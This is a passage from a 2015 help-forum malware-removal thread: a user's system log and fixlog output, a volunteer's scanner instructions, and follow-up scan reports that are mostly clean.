NTRU TCG Software Stack (HKLM\...\{75E0B85A-085F-4BA3-B2BF-1995AFD8024D}) (Version: 2.1.34 - Security Innovation) Hidden
O2Micro Flash Memory Card Windows Driver (HKLM-x32\...\{938A412F-78C1-4158-8590-038A1D670A57}) (Version: 3.0.07.47 - O2Micro International LTD.) Hidden
O2Micro Flash Memory Card Windows Driver (HKLM-x32\...\InstallShield_{938A412F-78C1-4158-8590-038A1D670A57}) (Version: 3.0.07.47 - O2Micro International LTD.)
O2Micro OZ776 SCR Driver (HKLM\...\{732D0C79-C6E3-4EDE-8D11-67D58697E0DE}) (Version: 2.1.4.210GS - O2Micro) Hidden
O2Micro OZ776 SCR Driver (HKLM-x32\...\InstallShield_{732D0C79-C6E3-4EDE-8D11-67D58697E0DE}) (Version: 2.1.4.210GS - O2Micro)
Office 15 Click-to-Run Extensibility Component (HKLM-x32\...\{90150000-008C-0000-0000-0000000FF1CE}) (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (HKLM\...\{90150000-008F-0000-1000-0000000FF1CE}) (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (HKLM-x32\...\{90150000-008C-0409-0000-0000000FF1CE}) (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
OpenOffice.org 3.3 (HKLM-x32\...\{3E171899-0175-47CC-84C4-562ACDD4C021}) (Version: 3.3.9567 - OpenOffice.org)
Opera Mobile (HKLM-x32\...\{FA55C144-16EC-4C19-ABFF-2E172C26950D}_is1) (Version:  - Opera Software ASA)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PC-CCID (HKLM\...\{3DCDFCDB-4D96-4CF0-9BB3-C91DAE9073F3}) (Version: 2.0.0 - Gemalto) Hidden
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
Pegasus Mail (HKLM-x32\...\Pegasus Mail) (Version:  - David Harris)
Pegasus Mail HTML Renderer 2.4.7.2 (HKLM-x32\...\{A9F5E1E1-1281-4862-90B4-6CF8E6AF83CE}_is1) (Version:  - Micha's Midnight Manufacture)
PhotoShowExpress (HKLM-x32\...\{3250260C-7A95-4632-893B-89657EB5545B}) (Version: 2.0.063 - Sonic Solutions) Hidden
piaip AppLocale (HKLM-x32\...\{394BE3D9-7F57-4638-A8D1-1D88671913B7}) (Version: 1.0.0 - MS)
Pidgin (HKLM-x32\...\Pidgin) (Version: 2.9.0 - )
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.2 - Power Software Ltd)
Preboot Manager (HKLM\...\{3A6BE9F4-5FC8-44BB-BE7B-32A29607FEF6}) (Version: 03.03.00.049 - Wave Systems Corp.) Hidden
PremiumSoft Navicat Lite 9.0 (HKLM-x32\...\PremiumSoft Navicat Lite_is1) (Version:  - PremiumSoft CyberTech Ltd.)
Private Information Manager (HKLM\...\{0B0A2153-58A6-4244-B458-25EDF5FCD809}) (Version: 07.01.00.007 - Wave Systems Corp.) Hidden
QuickTime (HKLM-x32\...\{0E64B098-8018-4256-BA23-C316A43AD9B0}) (Version: 7.72.80.56 - Apple Inc.)
RaidCall (HKLM-x32\...\RaidCall) (Version: 7.3.6-1.0.12972.94 - raidcall.com)
RBVirtualFolder64Inst (HKLM\...\{9D6DFAD6-09E5-445E-A4B5-A388FEEBD90D}) (Version: 1.00.0000 - Roxio, Inc.) Hidden
Roxio Creator Starter (HKLM-x32\...\{6F0BBEFE-BE1C-419B-BA1F-D36C9E7915BC}) (Version: 12.1.77.0 - Roxio)
Roxio File Backup (HKLM\...\{60B2315F-680F-4EB3-B8DD-CCDC86A7CCAB}) (Version: 1.3.2 - Roxio) Hidden
Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.)
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.4.0.9058 - Microsoft Corporation)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Sonic CinePlayer Decoder Pack (HKLM-x32\...\{9A00EC4E-27E1-42C4-98DD-662F32AC8870}) (Version: 4.3.0 - Sonic Solutions) Hidden
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.1 - Sophos Limited)
SPBA 5.9 (HKLM\...\{2EECD5EF-5095-467C-B80C-4AB3096EFD60}) (Version: 5.9.4.6686 - UPEK Inc.) Hidden
SQL Server 2012 Common Files (HKLM\...\{1D411379-9CE0-4B13-A19B-72D3222DD620}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Common Files (HKLM\...\{202AAF1F-69AA-442A-B59F-6B54B1AD07C6}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (HKLM\...\{18B2A97C-92C3-4AC7-BE72-F823E0BC895B}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (HKLM\...\{84FBCA4A-D650-4B0D-8094-EC0671FA9B91}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (HKLM\...\{54FF8FAB-DE27-4187-82F1-EBAE6AEE869A}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (HKLM\...\{6603C2CE-3C54-4F1D-92F9-8390CD4CCCA8}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Management Studio (HKLM\...\{26BFF1F1-5C03-4C55-9C7C-FD65889AFA70}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Management Studio (HKLM\...\{A7037EB2-F953-4B12-B843-195F4D988DA1}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server Browser for SQL Server 2012 (HKLM-x32\...\{4B9E6EB0-0EED-4E74-9479-F982C3254F71}) (Version: 11.0.2100.60 - Microsoft Corporation)
Sql Server Customer Experience Improvement Program (HKLM\...\{BED1EA3D-592D-4305-9D1F-20F03726EFC1}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TaxACT 2010 (HKLM-x32\...\TaxACT 2010) (Version:  - 2nd Story Software, Inc.)
TaxACT 2010 Michigan (HKLM-x32\...\TaxACT 2010 Michigan) (Version:  - 2nd Story Software, Inc.)
TaxACT 2011 - 1040 Edition (HKLM-x32\...\TaxACT 2011 - 1040 Edition) (Version:  - 2nd Story Software, Inc.)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
TeamViewer 8 (HKLM-x32\...\TeamViewer 8) (Version: 8.0.30992 - TeamViewer)
Trend Micro Client/Server Security Agent (HKLM-x32\...\{BED0B8A2-2986-49F8-90D6-FA008D37A3D2}) (Version: 3.0.3152 - Trend Micro)
Trusted Drive Manager (HKLM\...\{6AC87FB3-ACFC-4416-890C-8976D5A9B371}) (Version: 4.0.5.8 - Wave Systems Corp.) Hidden
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.2.1 - Tweaking.com)
Upek Touchchip Fingerprint Reader (HKLM\...\{4E60E212-3177-4B16-BCB3-616CCC52357D}) (Version: 1.2.004 - Dell Inc.) Hidden
Ventrilo Client (HKLM-x32\...\{789289CA-F73A-4A16-A331-54D498CE069F}) (Version: 3.0.8 - Flagship Industries, Inc.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
VmciSockets (HKLM\...\{98DE7960-458C-4104-90E9-910389C81AC9}) (Version: 9.1.54.1 - VMware, Inc.) Hidden
VMware Player (HKLM-x32\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 4.0.4.30409 - VMware, Inc.) Hidden
VMware Player (HKLM-x32\...\VMware_Player) (Version: 4.0.4.30409 - VMware, Inc)
Wave Infrastructure Installer (HKLM\...\{F52ABC1D-5EA4-4FDD-8E5F-CA31428570C0}) (Version: 07.66.40.0008 - Wave Systems Corp) Hidden
Wave Support Software Installer (HKLM\...\{07D618CD-B016-438A-ADC9-A75BD23F85CE}) (Version: 05.13.00.014 - Wave Systems Corp) Hidden
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7900 - Broadcom Corporation)
Widevine Media Optimizer IE 6.0.0 (HKCU\...\optimizer_ie) (Version: 6.0.0.12757 - Widevine Technologies)
Windows Driver Package - Dell Inc. PBADRV System  (09/11/2009 1.0.1.6) (HKLM\...\9512AA21B791B05A54E27065C45BBC417AB282DF) (Version: 09/11/2009 1.0.1.6 - Dell Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WinZip 19.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E9}) (Version: 19.5.11475 - WinZip Computing, S.L. )
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
Yahoo! Detect (HKLM-x32\...\YTdetect) (Version:  - )
 
========================= Devices: ================================
 
Name: Dell Wireless 375 Bluetooth Module
Description: Dell Wireless 375 Bluetooth Module
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Broadcom
Service: BTHUSB
Device ID: USB\VID_413C&PID_8187\C0F8DAE3B312
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Device ID: ROOT\*TEREDO\0000
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
 
 
========================= Memory info: ===================================
 
Percentage of memory in use: 61%
Total physical RAM: 3992.93 MB
Available physical RAM: 1548.2 MB
Total Pagefile: 7984.07 MB
Available Pagefile: 5509.65 MB
Total Virtual: 4095.88 MB
Available Virtual: 3973.58 MB
 
========================= Partitions: =====================================
 
1 Drive c: (OS) (Fixed) (Total:450.57 GB) (Free:116.65 GB) NTFS
 
========================= Users: ========================================
 
User accounts for \\SEVILLE
 
Administrator            dell 2                   Guest                    
 
========================= Minidump Files ==================================
 
No minidump file found
 
========================= Restore Points ==================================
 
03-06-2015 04:13:55 Scheduled Checkpoint
03-06-2015 07:13:44 Windows Update
05-06-2015 02:47:30 Checkpoint by HitmanPro
05-06-2015 04:11:35 Checkpoint by HitmanPro
05-06-2015 05:45:45 Checkpoint by HitmanPro
05-06-2015 14:06:59 Checkpoint by HitmanPro
05-06-2015 15:21:21 Checkpoint by HitmanPro
05-06-2015 15:22:15 Removed piaip AppLocale
 
**** End of log ****
 
========= End of CMD: =========
 
C:\Windows\system32\ysxja.exe => moved successfully.
C:\Windows\cygavb.exe => moved successfully.
C:\Windows\zlib.dll => moved successfully.
C:\Windows\mstdcvtr.bat => moved successfully.
C:\Windows\plofgye => moved successfully.
C:\Windows\soxe => moved successfully.
C:\Windows\initcvtr.bat => moved successfully.
C:\Windows\system32\Drivers\healusb.sys => moved successfully.
C:\Windows\system32\cygwin.sys => moved successfully.
C:\Windows\default.cfg => moved successfully.
C:\Windows\FiddlerCore4.dll => moved successfully.
 
=========  chkdsk c: |find /v "percent" >> "%userprofile%\desktop\checkhd.txt" =========
 
The type of the file system is NTFS.
Volume label is OS.
 
WARNING!  F parameter not specified.
Running CHKDSK in read-only mode.
 
CHKDSK is verifying files (stage 1 of 3)...
File verification completed.
  1364 large file records processed.                                   
 
  0 bad file records processed.                                     
 
  2 EA records processed.                                           
 
  139 reparse records processed.                                      
 
CHKDSK is verifying indexes (stage 2 of 3)...
Index verification completed.
  0 unindexed files recovered.                                      
 
CHKDSK is verifying security descriptors (stage 3 of 3)...
Security descriptor verification completed.
  61018 data files processed.                                           
 
CHKDSK is verifying Usn Journal...
Usn Journal verification completed.
Windows has checked the file system and found no problems.
 
 472453119 KB total disk space.
 315075748 KB in 360108 files.
    191668 KB in 61019 indexes.
         0 KB in bad sectors.
    593099 KB in use by the system.
     65536 KB occupied by the log file.
 156592604 KB available on disk.
 
      4096 bytes in each allocation unit.
 118113279 total allocation units on disk.
  39148151 allocation units available on disk.
 
========= End of CMD: =========
 
 
=========  type "C:\Users\dell 2\Desktop\checkhd.txt" =========
 
The system cannot find the file specified.
 
========= End of CMD: =========
 
C:\Windows\System32\Drivers\etc\hosts => moved successfully.
Hosts restored successfully.
 
========= RemoveProxy: =========
 
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
 
 
========= End of RemoveProxy: =========
 
 
=========  netsh winsock reset catalog =========
 
 
Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.
 
 
========= End of CMD: =========
 
 
=========  ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
EmptyTemp: => 40.3 MB temporary data Removed.
 
 
The system needed a reboot.. 
 
==== End of Fixlog 18:10:25 ====

so far no issues atm.



#10 B-boy/StyLe/

  • Malware Response Team

Posted 08 June 2015 - 07:44 PM

Hi,

 

Let's check for malware leftovers:

STEP 1

Please download Malwarebytes Anti-Malware 2.1.6.1022 Final to your desktop.
 

  • Double-click mbam-setup-2.1.6.1022.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • With some infections, you may see this message box.
    • 'Could not load DDA driver'
  • Click 'Yes' to this message, to allow the driver to load after a restart.
  • Allow the computer to restart. Continue with the rest of these instructions.
  • When the scan is complete, click Apply Actions.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

 

 

STEP 2

1. Please download HitmanPro.

  • For 32-bit Operating System - [download link]
  • This is the mirror - [download link]
  • For 64-bit Operating System - [download link]
  • This is the mirror - [download link]

2. Launch the program by double clicking on the HitmanPro icon. (Windows Vista/7 users right click on the HitmanPro icon and select run as administrator).

Note: If the program won't run, then please open the program while holding down the left CTRL key until the program is loaded.

3. Click on the next button. You must agree with the terms of EULA. (if asked)

4. Check the box beside "No, I only want to perform a one-time scan to check this computer".

5. Click on the next button.

6. The program will start to scan the computer. The scan will typically take no more than 2-3 minutes.

7. When the scan is done click on drop-down menu of the found entries (if any) and choose - Apply to all => Ignore <= IMPORTANT!!!

8. Click on the next button.

9. Click on the "Save Log" button.

10. Save that file to your desktop and post the content of that file in your next reply.
 
Note: if there isn't a dropdown menu when the scan is done then please don't delete anything and close HitmanPro.

Navigate to C:\ProgramData\HitmanPro\Logs, open the report and copy and paste it to your next reply.

Note: Programdata is hidden by default. Please make sure that you can view all hidden files. Instructions on how to do this can be found here:
How to see hidden files in Windows

STEP 3

  • Download EmsisoftEmergencyKit, run the exe and extract the content in a folder of your choice like (C:\EEK) by clicking the Extract button.
  • Double-click the desktop-shortcut called Start Emsisoft Emergency Kit to start the tool.
  • Click on the "Yes" button when asked to obtain the latest malware definitions.
  • Once the update is complete click "Scan".
  • Click on the "Yes" button when asked to enable the scan for Potentially Unwanted Applications.
  • Next click on the Full Scan. When the scan completes, click on the View Report button (don't delete or quarantine anything).
  • Please copy and paste the content of the report in your next reply.

 

 

Regards,

Georgi




#11 Mohasaiyan

  • Topic Starter

Posted 08 June 2015 - 09:43 PM

MalwareBytes Scan results

 

 
Scan Date: 2015/06/08
Scan Time: 21:43:03
Logfile: scan060815.txt
Administrator: Yes
 
Version: 2.01.6.1022
Malware Database: v2015.06.08.05
Rootkit Database: v2015.06.02.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: dell 2
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 607475
Time Elapsed: 52 min, 17 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)


#12 Mohasaiyan

  • Topic Starter

Posted 08 June 2015 - 10:45 PM

Hitmanpro scan

 

HitmanPro 3.7.9.241
www.hitmanpro.com
 
   Computer name . . . . : SEVILLE
   Windows . . . . . . . : 6.1.1.7601.X64/4
   User name . . . . . . : Seville\dell 2
   UAC . . . . . . . . . : Enabled
   License . . . . . . . : Paid (362 days left)
 
   Scan date . . . . . . : 2015-06-08 23:15:02
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 27m 15s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No
 
   Threats . . . . . . . : 0
   Traces  . . . . . . . : 1
 
   Objects scanned . . . : 2,416,861
   Files scanned . . . . : 127,589
   Remnants scanned  . . : 634,468 files / 1,654,804 keys
 
Suspicious files ____________________________________________________________
 
   C:\Users\dell 2\Downloads\FRST64.exe
      Size . . . . . . . : 2,108,928 bytes
      Age  . . . . . . . : 0.2 days (2015-06-08 18:04:38)
      Entropy  . . . . . : 7.5
      SHA-256  . . . . . : 23B98F644F9BFE0B6E32E501CCA88839EA890F22C65C722198E6A4C3C421A628
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
          0.0s C:\Users\dell 2\Downloads\FRST64.exe
          0.8s C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\CmnClnt\ccSubSDK\{6D09DA5A-C577-4963-B560-76E3A774703E}
 
 
 


#13 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria
  • Local time:09:00 AM

Posted 09 June 2015 - 04:50 AM

Hi,

 

Nice work. The logs are clean!

Here is the last set of steps just to make sure nothing is lurking in the dark corners.

 

 

STEP 1

 

 

Before I let you go I'd like to scan your machine with ESET OnlineScan.
 

  • Please download and run the exe from the link below:
    ESET OnlineScan
  • Check the Accept Terms box.
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Check the option beside: Enable detection of potentially unwanted applications
  • Now click on Advanced Settings and make sure that the option Remove found threats is NOT checked, and select the following:
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
    • Click on the Change button and select only Operating memory and drive C:\
  • Push the Start button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, push List Threats.
  • Push Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Push the Back button.
  • Push Finish.

 

 

STEP 2

 

 

Also, let's check for outdated and vulnerable software on your PC.

 

 

Download Security Check by screen317 from here.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

 

and then if there aren't any issues left I'll give you my final recommendations. :)

Let me know about any remaining issues.

 

 

Regards,

Georgi




#14 Mohasaiyan

Mohasaiyan
  • Topic Starter

  • Members
  • 10 posts
  • Local time:02:00 AM

Posted 09 June 2015 - 10:12 AM

Sorry, I had gone to sleep before running Emsisoft, and that scan did not come back clean.

 

Emsisoft Emergency Kit - Version 9.0
Last update: 2015/06/08 23:18:24
User account: Seville\dell 2
 
Scan settings:
 
Scan type: Full Scan
Objects: Rootkits, Memory, Traces, C:\, Q:\
 
Detect PUPs: On
Scan archives: On
ADS Scan: On
File extension filter: Off
Advanced caching: On
Direct disk access: Off
 
Scan start: 2015/06/08 23:20:51
Value: HKEY_USERS\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLETASKMGR detected: Setting.DisableTaskMgr (A)
Value: HKEY_USERS\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLEREGISTRYTOOLS detected: Setting.DisableRegistryTools (A)
 
Scanned 448263
Found 2
 
Scan end: 2015/06/09 2:04:36
Scan time: 2:43:45


#15 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria
  • Local time:09:00 AM

Posted 09 June 2015 - 11:05 AM

Hi,

 

The log is clean. You can ignore those detections.

Please proceed with the rest of the steps and then when done I'll give you my final recommendations.

 

Regards,

Georgi






